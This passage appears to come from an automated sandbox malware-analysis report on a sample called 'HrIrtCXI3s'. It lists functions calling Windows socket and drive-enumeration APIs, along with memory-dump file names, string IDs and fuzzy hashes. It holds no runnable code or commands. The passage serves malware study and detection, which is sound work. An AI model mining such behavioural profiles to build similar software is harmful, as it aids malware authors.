                                                      • WSAStartup.WS2_32(00000202), ref: 004ED65B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID: if_nametoindex$iphlpapi.dll
                                                      • API String ID: 724789610-3097795196
                                                      • Opcode ID: 9364fc30d0353cbec305c39efc9d86a6e16f1e4adb1acbeb0c1d568139726566
                                                      • Instruction ID: 5beef27f288e80f7231d38bbaf1fb62d29a606b7ad2d1eababdc322080939a8f
                                                      • Opcode Fuzzy Hash: 9364fc30d0353cbec305c39efc9d86a6e16f1e4adb1acbeb0c1d568139726566
                                                      • Instruction Fuzzy Hash: 1F012BD0D4438157FB216B39AD1732725D07B56309F440969EC88922D2FB7DC6C8C297
                                                      APIs
                                                      • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0059AB9A
                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0059ABE3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: ioctlsocketsocket
                                                      • String ID:
                                                      • API String ID: 416004797-0
                                                      • Opcode ID: 0152fa0dcebf13ac002b1128240b6d342017e64f6ce963318d8b52054ab294af
                                                      • Instruction ID: 29b42dec163e7982673326a04db7d9a802aca12d7c88c6b7f0ea40a2e45c010c
                                                      • Opcode Fuzzy Hash: 0152fa0dcebf13ac002b1128240b6d342017e64f6ce963318d8b52054ab294af
                                                      • Instruction Fuzzy Hash: 7BE19E706043019BEB20CF24C885B6ABBE5FF85314F144A2DF9999B291E775DD44CBA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 47412d6204327917a500152264c261968b4170afccb8f4e1cc73dcec426fb2cf
                                                      • Instruction ID: a1c1628c99bddb1fd2843c8a07c8ed0fc8723729832026d629997d6a614f8590
                                                      • Opcode Fuzzy Hash: 47412d6204327917a500152264c261968b4170afccb8f4e1cc73dcec426fb2cf
                                                      • Instruction Fuzzy Hash: 8271D3EB17C121BE726291952B54AFB6BEDF5F7730B308466F807D6602E2D80EC91171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 768de728fe7fda26f06e6f819da8ee8b59b28b43ed8245baf3e2cd6895d784fb
                                                      • Instruction ID: 2d523a410cd398e1c54c060561aaa45e91ee6b638d5b788fb5d6cbc335391678
                                                      • Opcode Fuzzy Hash: 768de728fe7fda26f06e6f819da8ee8b59b28b43ed8245baf3e2cd6895d784fb
                                                      • Instruction Fuzzy Hash: 6471C0EB17C125BE716291852B54AFB6BEEF5F7730B308466F807D6602E2D80EC91171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: a8b5aa4e4c98d6dec9a414666ecefe73b82c1906d8aa6b262bca62e7f688fdbb
                                                      • Instruction ID: da91b10a98cb6e9a63beb29ed29433c43cb3f363960d7e734ca053fa10c8a021
                                                      • Opcode Fuzzy Hash: a8b5aa4e4c98d6dec9a414666ecefe73b82c1906d8aa6b262bca62e7f688fdbb
                                                      • Instruction Fuzzy Hash: 9C7103EB17C160BEB26291452B54AFB6BEDF5F7730B308466F807DA602E2D80EC95171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 1043948ad6a661933188be8ad684f7e1ad6bc7866dee90b7ea503768bbf46f17
                                                      • Instruction ID: 214b3de7819ecab896c55c496d7d5b8f73583a4d0004867063c1c7fa5cf89c0b
                                                      • Opcode Fuzzy Hash: 1043948ad6a661933188be8ad684f7e1ad6bc7866dee90b7ea503768bbf46f17
                                                      • Instruction Fuzzy Hash: 2261C3EB17C125BE716291852B54AFB6BEEF5F7730B308466F807D6602E2D80EC91171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: c8576d14528a8848407c93702b0f0ce3f06964016dfc63f2da6749e986bd3c61
                                                      • Instruction ID: 26a7f1b6cd91cc02eef936d0344a6cc6c160e1e43fafcbd2f306baa221924ab7
                                                      • Opcode Fuzzy Hash: c8576d14528a8848407c93702b0f0ce3f06964016dfc63f2da6749e986bd3c61
                                                      • Instruction Fuzzy Hash: E561E5EB17C160BEB26281452B54AFB6BADF5F7730B318467F407DA602E2D80BCA5131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 9c4837c53e050b2d912e6a5e83731f92718d9df1583e4bb4c24fa97a305a3069
                                                      • Instruction ID: 7f3b541353ec12a1f30e01da5662d4ff459f2a1d5bbf3445a00fc3b7b231c2e4
                                                      • Opcode Fuzzy Hash: 9c4837c53e050b2d912e6a5e83731f92718d9df1583e4bb4c24fa97a305a3069
                                                      • Instruction Fuzzy Hash: 736170EB17C125BE716291452B64AFB6BADF5F7730B308466F807D6602E2D80ECA1171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: dcf31292baafa3991c216353114bc852737e6cb301d93315117b3dc44152b5af
                                                      • Instruction ID: c6ecb1b5a4f29b70ab89126780a3a810dbf41cad5531539f385cc6c7f70fa0a4
                                                      • Opcode Fuzzy Hash: dcf31292baafa3991c216353114bc852737e6cb301d93315117b3dc44152b5af
                                                      • Instruction Fuzzy Hash: A2519FEB17C161BE716281452B54AFB6BAEF5F7730B308466F807D6602E2D80FCA1171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 0db1fd806ca9a7e95d317b9f621e2942ee4476c3477c8bbf07dda6e0a00014cb
                                                      • Instruction ID: f7c63e51c9968f738f2ae7fb161a30128caf04178086fd62dbea9f53a5847c41
                                                      • Opcode Fuzzy Hash: 0db1fd806ca9a7e95d317b9f621e2942ee4476c3477c8bbf07dda6e0a00014cb
                                                      • Instruction Fuzzy Hash: 8B5170EB17C125BE716291462B54AFB5BADF5F7730B308467F807DA602E2D80BCA1171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 0acb1aa86a5628d4d8dde34170dfe7d058643d9607533d0b973b49ab6542968f
                                                      • Instruction ID: 744a17a6494dff67ee69193105f71e0da4edf4d9bb383871eb5bcb05339b32c5
                                                      • Opcode Fuzzy Hash: 0acb1aa86a5628d4d8dde34170dfe7d058643d9607533d0b973b49ab6542968f
                                                      • Instruction Fuzzy Hash: D851A1EB17C125BE716291852B64AFB5BADF5F7730B308466F807DA602E2D80FC91171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 31155e3abd3fe12bbaa0077c112e6f4737a7a9fe05c673a3083500f98d83d8ea
                                                      • Instruction ID: 7783d1b86c61a6b586f7b321b8d7d05abe89ee6787b28d93b54e3926384e7e7b
                                                      • Opcode Fuzzy Hash: 31155e3abd3fe12bbaa0077c112e6f4737a7a9fe05c673a3083500f98d83d8ea
                                                      • Instruction Fuzzy Hash: 1E5191EB17C165BE716291852B54AFB6BAEF5F7730B308466F407DA602E2D80FC91131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: dcc656f76bc5d9ae38b8ddf0d2d600dfdb928ea3566feb53b3631927310ce518
                                                      • Instruction ID: 6826f68365f4034bf2857f0e9373883bf531675c3105a6c51fa0631ff3500172
                                                      • Opcode Fuzzy Hash: dcc656f76bc5d9ae38b8ddf0d2d600dfdb928ea3566feb53b3631927310ce518
                                                      • Instruction Fuzzy Hash: 305191EB17C161BE716291852B54AFB6BAEF5F7730B308466F807D5602E2D80BCA1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 8d21c59fad0586a132b521265289f6a845606f030f94315e829764dcb871b7d2
                                                      • Instruction ID: f63f71b45e15d1ed6eed8f2e62346a2198a1ee89d511dbade9cb05ee1af0f87f
                                                      • Opcode Fuzzy Hash: 8d21c59fad0586a132b521265289f6a845606f030f94315e829764dcb871b7d2
                                                      • Instruction Fuzzy Hash: 0251A2EB17C121BE716291852B54AFB6BAEF5F7730B308466F407DA602E2D40BC91171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 2d8b2b3e54a558697699c99477e4eb1f23a8966a3c18cd5644fef84e0ac752fc
                                                      • Instruction ID: bd77770159f9543735dfc666f9b316a3ead61df46b0bca0b9e8f9af5cff678f0
                                                      • Opcode Fuzzy Hash: 2d8b2b3e54a558697699c99477e4eb1f23a8966a3c18cd5644fef84e0ac752fc
                                                      • Instruction Fuzzy Hash: E351C1EB17C125BE626291852B94AFA6BAEF5F7730B308466F407D5602E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 2a7a5e0acb0a17c4042c1891830721695ecb62d90427f7f891e37cbc08fcc19a
                                                      • Instruction ID: 94ce76035b2046d6c1c8bb4b510112fad3569ce4b10263da30e929b62c2335e4
                                                      • Opcode Fuzzy Hash: 2a7a5e0acb0a17c4042c1891830721695ecb62d90427f7f891e37cbc08fcc19a
                                                      • Instruction Fuzzy Hash: 1551B1EB57C125BE626291852B94AFB6BEEF5F7730B308466F407D6602E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 7e0c0226fd5e250c926e7568cb6f1b8b1455630517823c1672427a42f3bae1b4
                                                      • Instruction ID: 264c713c220385602ba65e1f0f6259591087aa61eaa9bbcace7cad287e3d38b0
                                                      • Opcode Fuzzy Hash: 7e0c0226fd5e250c926e7568cb6f1b8b1455630517823c1672427a42f3bae1b4
                                                      • Instruction Fuzzy Hash: 2D41B2EB57C125BE626291852B54AFB6BAEF5F7730B308466F407D6602E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: a7e6a82dbf56353e4120f528de9019eb6c3aa3629fdc6d0205659d024418d46a
                                                      • Instruction ID: e7b696004ceb71a63e564243898343a9f5c5d3755f579c21c719d403d0c49aad
                                                      • Opcode Fuzzy Hash: a7e6a82dbf56353e4120f528de9019eb6c3aa3629fdc6d0205659d024418d46a
                                                      • Instruction Fuzzy Hash: 3941D3EB17C125BE726295852B54AFB6BADF5F7730B308466F407D5602E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 4ebb7530ac988def6bd30f16edb6e33ab27de424bd85e4578ff505e1c4252cbd
                                                      • Instruction ID: be31661256f5d290bcd29dcf7722db6fc24284b7698b1648b2e2e953a83a7543
                                                      • Opcode Fuzzy Hash: 4ebb7530ac988def6bd30f16edb6e33ab27de424bd85e4578ff505e1c4252cbd
                                                      • Instruction Fuzzy Hash: C441A0EB57C125BE626291852B94AFB6BAEF5F7730B308466F407D9602E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: f2184d1201735d1971a39f2724a0cde16b74a193a051ae29bb64455c4fb9b463
                                                      • Instruction ID: 02d46e05cc68a52b53b2735a3619fac56f4e8b06b0d3f4b28dd448fd93fa1109
                                                      • Opcode Fuzzy Hash: f2184d1201735d1971a39f2724a0cde16b74a193a051ae29bb64455c4fb9b463
                                                      • Instruction Fuzzy Hash: E341D3EB57C124BE716291852B95AFB6BADF5F7730B308466F407D5602E2E40BCD1132
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 4c5c12f8ab65ee4e7a33676e12f14b1707aeca940844611ab045bb3a8ecf654f
                                                      • Instruction ID: df39cd644b0c1fa4548836ea0100850db0a80e18f86492c020e282e1ed413aa1
                                                      • Opcode Fuzzy Hash: 4c5c12f8ab65ee4e7a33676e12f14b1707aeca940844611ab045bb3a8ecf654f
                                                      • Instruction Fuzzy Hash: E141D0EB57C124BE726291852B94AFB6BAEF5F7730B308466F407D5A02E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 29a477aaab27a1117c2e2825dad7c4c36f135b9d70fb20e81f2e46e931305d82
                                                      • Instruction ID: 19b9cee10eb34ec0c58fabf7678765a5202242c4846f1f0c79e99c4a2804ea2c
                                                      • Opcode Fuzzy Hash: 29a477aaab27a1117c2e2825dad7c4c36f135b9d70fb20e81f2e46e931305d82
                                                      • Instruction Fuzzy Hash: 4E41A0EB57C125BE626291852B94AFB6BAEF5F7730B308466F407D5602E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: cedcbd9457ca3a13d6d8b9e192163a44e90c8fba4e892fbc60c9411597087158
                                                      • Instruction ID: d73128eef35218a532dc6f06ad4461fd6a2948bc5356e3338c92ab95b7640901
                                                      • Opcode Fuzzy Hash: cedcbd9457ca3a13d6d8b9e192163a44e90c8fba4e892fbc60c9411597087158
                                                      • Instruction Fuzzy Hash: 4941B1EB57C121BEB26291952B94AFA6BAEF5F7730B308467F407D5602E2D40BCD1132
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 624e8dafbeb1a22c4b4719423b055cdddf40a85ca2e4ccb855d38f41d61ecf84
                                                      • Instruction ID: db442c24e78c30c42c4fce64868aea746155517c48488156be6d677b7fdaac7d
                                                      • Opcode Fuzzy Hash: 624e8dafbeb1a22c4b4719423b055cdddf40a85ca2e4ccb855d38f41d61ecf84
                                                      • Instruction Fuzzy Hash: C041D1EB57C120BE726291852B94AFB6BAEF5F7730B308466F407D5602E2E40BCD1132
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: f7d4c8bea5ed2df73dcc194597a951802d861d4d29ba943b7ab8279e460eca87
                                                      • Instruction ID: 0960b9709eb242520b1f28abae332402e23f67d61770e2ff746f24da3f934909
                                                      • Opcode Fuzzy Hash: f7d4c8bea5ed2df73dcc194597a951802d861d4d29ba943b7ab8279e460eca87
                                                      • Instruction Fuzzy Hash: 4041CFEB57C120BE726291962B98AFB6BADF5F7730B308466F407D5502E2D40BCD1172
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 4992f1f6c99d7f5c2f47aa3cfe5a13a831947473df9075be709b2107076a7def
                                                      • Instruction ID: 79f5c633f35e8ec1e6be71c744da7b5a252e3dcec36b2fcfe05691d3023df933
                                                      • Opcode Fuzzy Hash: 4992f1f6c99d7f5c2f47aa3cfe5a13a831947473df9075be709b2107076a7def
                                                      • Instruction Fuzzy Hash: 6641C1EB57C120BE716291952B94AFB6BAEF5F7730B308466F407D5602E2D40BCD1132
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 845e699625bf04038dd1f4b6ba3848ad09b8ba154daa76991c845390c2ab5322
                                                      • Instruction ID: b4bcc4ce75b5477728c266ca0753f2163b4b2d66a2d71a543891da4c1379160c
                                                      • Opcode Fuzzy Hash: 845e699625bf04038dd1f4b6ba3848ad09b8ba154daa76991c845390c2ab5322
                                                      • Instruction Fuzzy Hash: AD41BFEB17C114BEB16291952B94AFB6BADF6F7730B308426F407D5502E2E40BCE1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: cc6ec367dfc52e6ed95785f93ed6c48162265f4217032be829b335120c7444df
                                                      • Instruction ID: cc36cfd1555d24ffab7401f31652cc1837b79c4b2e0919de86e543d52f369f97
                                                      • Opcode Fuzzy Hash: cc6ec367dfc52e6ed95785f93ed6c48162265f4217032be829b335120c7444df
                                                      • Instruction Fuzzy Hash: D741BFEB57C120BE726291962B94AFA6BAEF5F7730B308467F407D5602E2D40BCD1132
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 55e1e60feea73787a97848ecef63c485ad372ca95f0e9422d596a2ee691ac4bc
                                                      • Instruction ID: 2500ee74dabf79e030535337be6bb9abbc20933df68fb8d30be5283f366bc34c
                                                      • Opcode Fuzzy Hash: 55e1e60feea73787a97848ecef63c485ad372ca95f0e9422d596a2ee691ac4bc
                                                      • Instruction Fuzzy Hash: 58315AEB17C125BEB16291962B98AFB6BADF5E7730B308427F407D5502E2E40BCD1171
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
